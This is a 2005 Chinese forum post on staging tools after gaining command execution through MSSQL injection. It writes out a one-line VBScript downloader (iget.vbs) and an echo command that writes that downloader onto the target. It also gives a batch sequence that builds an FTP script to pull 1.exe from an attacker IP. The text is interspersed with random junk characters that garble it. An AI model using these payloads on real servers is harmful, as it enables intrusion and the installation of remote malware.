标题: mssql注射时不可以多次echo的解决办法 [打印本页] 作者: 韩冰 时间: 2005-1-23 13:30 标题: mssql注射时不可以多次echo的解决办法 <>解决办法: , s" d+ _' m; w: l) O# B. y. g
1.iget.vbs一次写入 ; X6 |, D# {/ {+ n, k在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 1 F* ^3 v( Z( L5 ]9 Q
1 L, }9 `2 T8 k( Y0 A/ _ iSet x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 9 V( `0 T3 X4 h. h5 @/ T4 o8 }: C
这样我们可以一次echo成功,echo版本: d, U( M c9 c
6 O3 l( T3 l# {( n. W. U2 ^, P/ F
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs : n$ m9 \) M0 x2 h8 U6 s: B( L
; _4 A C. L- q% y+ S
% O2 q7 g7 h9 S2.bat调用ftp脚本的写法(by envymask) ) v' c+ y2 ~% a" E- c: b+ k' m5 H # e1 p9 B; q) y1 C1 j. ~8 l c0 i5 P8 vecho ftp>1.vbs " ] a" G4 L/ d( I3 B2 M, @+ lecho open ip>2.vbs 6 w: V# M' o8 u/ |( W, W1 J4 ]. qecho u>3.vbs * I- D3 n. S. C
echo s>4.vbs 0 `( x. K! j, L- e* G8 \# i& eecho binary>5.vbs 1 s0 {: f' |; i/ ?1 Z
echo get 1.exe>6.vbs ( S9 }# {6 s" q" G
echo bay>7.vbs , z/ i9 n. l3 I$ Q
$ m2 y. g+ n& }# g5 U* H
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs / v6 L u$ T- [; d: x
</P>